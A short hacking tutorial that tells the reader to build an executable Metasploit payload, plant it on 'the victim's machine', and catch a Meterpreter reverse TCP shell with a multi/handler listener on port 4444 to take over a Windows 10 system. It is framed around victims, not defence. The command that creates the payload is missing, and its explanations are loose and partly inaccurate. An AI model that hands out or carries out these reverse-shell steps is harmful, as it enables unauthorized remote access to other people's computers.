PAYLOAD
Today we are looking at an advanced and useful realtime stuff Payload.
A payload is very much similar to a virus.Payload is a set of codes designed to hack a device.
So that's it NO MORE THEORY , LET'S DO SOME PRACTICAL!!!
Hack a windows 10 system using payload
STEP -1 Creating a payload
- Open terminal in kali linux and type the following command
Here LHOST is the local host IP means IP of our kali machine.(it can be obtained by typing 'ifconfig' in terminal
- STEP-2 Placing the payload in the victim's System
A file named test1.exe is saved to my Desktop/virus Folder . This file is our Payload, now put this file in to the victim's machine. That's up to you......
Here I put the payload in to my windows PC.
- STEP-3 Accessing the target system
>msfconsole
Open msfconsole
>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lhost <your local ip>
>set lport 4444
>exploit
Now run the payload in victim's PC
NOW YOU CAN GET ACCESS TO THE TARGET SYSTEM.
To view the available options, Type 'help'